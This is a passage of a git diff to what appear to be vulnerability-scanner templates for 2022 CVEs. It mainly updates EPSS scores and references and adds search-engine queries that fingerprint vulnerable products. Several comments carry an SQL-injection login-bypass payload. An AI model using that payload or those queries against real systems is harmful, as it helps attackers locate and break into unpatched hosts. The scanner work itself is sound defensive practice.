cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index f1d882f18c..500501c96a 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31977 cwe-id: CWE-89 - epss-score: 0.01192 - epss-percentile: 0.83594 + epss-score: 0.02266 + epss-percentile: 0.89602 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 63697be4ed..2b627f8a44 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31981 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index d7d9c8d698..37e248af3b 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -14,13 +14,15 @@ info: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31983 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-31983 cwe-id: CWE-89 - epss-score: 0.00834 - epss-percentile: 0.80157 + epss-score: 0.13959 + epss-percentile: 0.95665 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index 301514c200..a4aa7c052e 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31984 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 3fff028ab9..2a6425936c 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32015 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index 03f4f75f3c..5ec3f75e1f 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32018 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 63f2d90739..ded26d3ae3 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -28,6 +28,7 @@ info: vendor: car_rental_management_system_project product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project http: diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 316fc83d33..fc46e42229 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -28,6 +28,7 @@ info: product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 14765055c5..578029f2fa 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -29,6 +29,7 @@ info: product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index d770372ee9..defbacfc5e 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -30,6 +30,7 @@ info: product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index bd9a8b794a..0abfa87623 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -29,6 +29,7 @@ info: product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 43fd7e005e..38aa8ee5c5 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32094 cwe-id: CWE-89 - epss-score: 0.01192 - epss-percentile: 0.83651 + epss-score: 0.02031 + epss-percentile: 0.88909 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: hospital_management_system_project product: hospital_management_system shodan-query: http.html:"Hospital Management System" + fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project http: diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index a06e93bdc7..60b8b5b9f5 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-32195 cwe-id: CWE-79 epss-score: 0.00112 - epss-percentile: 0.43735 + epss-percentile: 0.44633 cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: open_edx shodan-query: http.html:"Open edX" comment: Hover the cursor on the redirect link + fofa-query: body="open edx" tags: cve,cve2022,openedx,xss,edx http: diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 970cc96d0e..48846eef9c 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-32409 cwe-id: CWE-22 epss-score: 0.47251 - epss-percentile: 0.97372 + epss-percentile: 0.97452 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: softwarepublico product: i3geo shodan-query: http.html:"i3geo" + fofa-query: body="i3geo" tags: cve2022,cve,i3geo,lfi,softwarepublico http: diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index ab1b488535..4705c7210a 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3242 cwe-id: CWE-79,CWE-94 - epss-score: 0.024 - epss-percentile: 0.8882 + epss-score: 0.02135 + epss-percentile: 0.89247 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,huntr,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index f946f1268c..d775902a68 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32429 cwe-id: CWE-287 - epss-score: 0.15342 - epss-percentile: 0.95742 + epss-score: 0.16163 + epss-percentile: 0.95978 cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32430.yaml b/http/cves/2022/CVE-2022-32430.yaml index 98550c804a..2fc11ed28c 100644 --- a/http/cves/2022/CVE-2022-32430.yaml +++ b/http/cves/2022/CVE-2022-32430.yaml @@ -23,6 +23,7 @@ info: vendor: talelin product: lin-cms-spring-boot fofa-query: body="心上无垢,林间有风" + shodan-query: http.html:"心上无垢,林间有风" tags: cve,cve2022,lin-cms,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index c253fd2076..0beea4ffc1 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -13,13 +13,15 @@ info: reference: - https://github.com/u5cms/u5cms/issues/50 - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Sharpforce/cybersecurity classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 - epss-score: 0.00237 - epss-percentile: 0.61804 + epss-score: 0.00148 + epss-percentile: 0.50728 cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index 8a03aa579d..2847a4d4a3 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -14,13 +14,15 @@ info: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql - https://nvd.nist.gov/vuln/detail/CVE-2022-32770 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32770 cwe-id: CWE-79 - epss-score: 0.00103 - epss-percentile: 0.41592 + epss-score: 0.00136 + epss-percentile: 0.49015 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,7 @@ info: vendor: wwbn product: avideo shodan-query: http.html:"AVideo" + fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn http: diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 99d9a0c458..e80317e13e 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-32771 cwe-id: CWE-79 epss-score: 0.00074 - epss-percentile: 0.30395 + epss-percentile: 0.31793 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: wwbn product: avideo shodan-query: http.html:"AVideo" + fofa-query: body="avideo" tags: cve,cve2022,avideo,xss,wwbn http: diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index 77d222d80a..17f96e5611 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -14,13 +14,15 @@ info: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql - https://nvd.nist.gov/vuln/detail/CVE-2022-32772 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32772 cwe-id: CWE-79 - epss-score: 0.00056 - epss-percentile: 0.21026 + epss-score: 0.00074 + epss-percentile: 0.31793 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,7 @@ info: vendor: wwbn product: avideo shodan-query: http.html:"AVideo" + fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn http: diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index c147ddcde0..1c6019d9ed 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 - epss-score: 0.0157 - epss-percentile: 0.86981 + epss-score: 0.00314 + epss-percentile: 0.70155 cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: nuuo product: nvrsolo_firmware shodan-query: http.html:"NVRsolo" + fofa-query: body="nvrsolo" tags: cve,cve2022,nvrsolo,xss,nuuo http: diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 6bd02c9441..575a68ce83 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -30,6 +30,7 @@ info: vendor: powertekpdus product: basic_pdu_firmware shodan-query: http.html:"Powertek" + fofa-query: body="powertek" tags: cve2022,cve,powertek,auth-bypass,powertekpdus http: diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index f24ba6dee7..86cc26f3f5 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-33891 cwe-id: CWE-78 - epss-score: 0.97289 - epss-percentile: 0.99851 + epss-score: 0.97208 + epss-percentile: 0.99827 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: apache product: spark shodan-query: title:"Spark Master at" + fofa-query: body="/apps/imt/html/" + google-query: intitle:"spark master at" tags: cve2022,cve,apache,spark,kev,packetstorm variables: command: "echo CVE-2022-33891 | rev" diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 2294352f6f..0e4fd8bcb3 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33901 epss-score: 0.00779 - epss-percentile: 0.80981 + epss-percentile: 0.81349 cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index a7b0e3bfcc..08d0ce7a43 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-33965 cwe-id: CWE-89 - epss-score: 0.01233 - epss-percentile: 0.83986 + epss-score: 0.01516 + epss-percentile: 0.86982 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -31,6 +31,8 @@ info: product: wp_visitor_statistics framework: wordpress google-query: inurl:"/wp-content/plugins/wp-stats-manager" + fofa-query: body="wp-stats-manager" + shodan-query: http.html:"wp-stats-manager" tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market http: diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index c894429126..2efff32f32 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-34045 cwe-id: CWE-798 epss-score: 0.05662 - epss-percentile: 0.93156 + epss-percentile: 0.93312 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: wavlink product: wl-wn530hg4_firmware shodan-query: http.html:"WN530HG4" + fofa-query: body="wn530hg4" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index b1060a2f78..7de45889d4 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34046 cwe-id: CWE-863 epss-score: 0.14292 - epss-percentile: 0.95577 + epss-percentile: 0.95713 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: wavlink product: wn533a8_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,packetstorm,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 954b71dae4..471a1e56b4 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: body="wn530hg4" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,router,exposure,packetstorm http: diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index cd377ce7c0..21de1b1035 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wn533a8_firmware shodan-query: http.html:"Wavlink" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve2022,cve,wavlink,xss,router,edb http: diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index c9d91f7d05..d132165ace 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: body="wn530hg4" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index d7d192cc8f..bd71b9e337 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -17,14 +17,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34093 cwe-id: CWE-79 - epss-score: 0.00266 - epss-percentile: 0.65533 + epss-score: 0.00258 + epss-percentile: 0.65535 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: softwarepublico product: i3geo + shodan-query: http.html:"i3geo" + fofa-query: body="i3geo" tags: cve,cve2022,i3geo,xss,softwarepublico http: diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 41df93a9f5..26d84ff584 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -17,14 +17,16 @@ info: cvss-score: 6.1 cve-id: CVE-2022-34094 cwe-id: CWE-79 - epss-score: 0.00266 - epss-percentile: 0.65533 + epss-score: 0.00258 + epss-percentile: 0.65535 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: softwarepublico product: i3geo + shodan-query: http.html:"i3geo" + fofa-query: body="i3geo" tags: cve2022,cve,i3geo,xss,softwarepublico http: diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 6c023aa399..6a6add0649 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34121 cwe-id: CWE-829 - epss-score: 0.66943 - epss-percentile: 0.97855 + epss-score: 0.69358 + epss-percentile: 0.97998 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 0cb67471d4..e90c595780 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-34328 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36967 + epss-percentile: 0.37623 cpe: cpe:2.3:a:sigb:pmb:7.3.10:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: sigb product: pmb shodan-query: http.html:"PMB Group" + fofa-query: body="pmb group" tags: cve,cve2022,pmb,xss,pmb_project http: diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 77c1005781..ad06d8b20c 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34576 epss-score: 0.03075 - epss-percentile: 0.90796 + epss-percentile: 0.91011 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.html:"Wavlink" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 7ff5fdfdac..0d7981b750 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-34590 cwe-id: CWE-89 - epss-score: 0.01429 - epss-percentile: 0.86269 + epss-score: 0.01426 + epss-percentile: 0.86518 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: hospital_management_system_project product: hospital_management_system shodan-query: http.html:"Hospital Management System" + fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project http: diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 1124ffaca8..d623bf0f7b 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -29,6 +29,7 @@ info: vendor: schneider-electric product: spacelogic_c-bus_home_controller_firmware shodan-query: html:"SpaceLogic C-Bus" + fofa-query: body="spacelogic c-bus" tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric http: diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 04519a5b18..d0a786ab3d 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -30,6 +30,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve,cve2022,xss,kkfileview,keking http: diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index b93c5d5cd7..a2ca9e2c53 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -29,6 +29,8 @@ info: vendor: zohocorp product: manageengine_access_manager_plus shodan-query: http.title:"ManageEngine" + fofa-query: title="manageengine" + google-query: intitle:"manageengine" tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp http: diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 6dd5baad96..990cc6514d 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -30,6 +30,8 @@ info: vendor: pentasecurity product: wapples shodan-query: http.title:"Intelligent WAPPLES" + fofa-query: title="intelligent wapples" + google-query: intitle:"intelligent wapples" tags: cve,cve2022,wapples,firewall,default-login,pentasecurity http: diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 0db605cff6..692efb5b87 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35416 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36353 + epss-score: 0.00102 + epss-percentile: 0.41641 cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 592dc3e926..d2afd30ad4 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35493 cwe-id: CWE-79 - epss-score: 0.00157 - epss-percentile: 0.52174 + epss-score: 0.00118 + epss-percentile: 0.45934 cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: wrteam product: eshop_-_ecommerce_\/_store_website shodan-query: http.html:"eShop - Multipurpose Ecommerce" + fofa-query: body="eshop - multipurpose ecommerce" tags: cve,cve2022,eshop,xss,wrteam http: diff --git a/http/cves/2022/CVE-2022-35653.yaml b/http/cves/2022/CVE-2022-35653.yaml index 022fbc4de6..5637fd770c 100644 --- a/http/cves/2022/CVE-2022-35653.yaml +++ b/http/cves/2022/CVE-2022-35653.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35653 cwe-id: CWE-79 - epss-score: 0.00921 - epss-percentile: 0.82544 + epss-score: 0.01147 + epss-percentile: 0.84758 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: moodle product: moodle shodan-query: title:"Moodle" + fofa-query: title="moodle" + google-query: intitle:"moodle" tags: cve,cve2022,moodle,xss http: diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index f235f695f9..ed663ceefd 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3578 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45981 + epss-score: 0.00122 + epss-percentile: 0.46518 cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index 706f623aa0..e7b76c15b0 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ 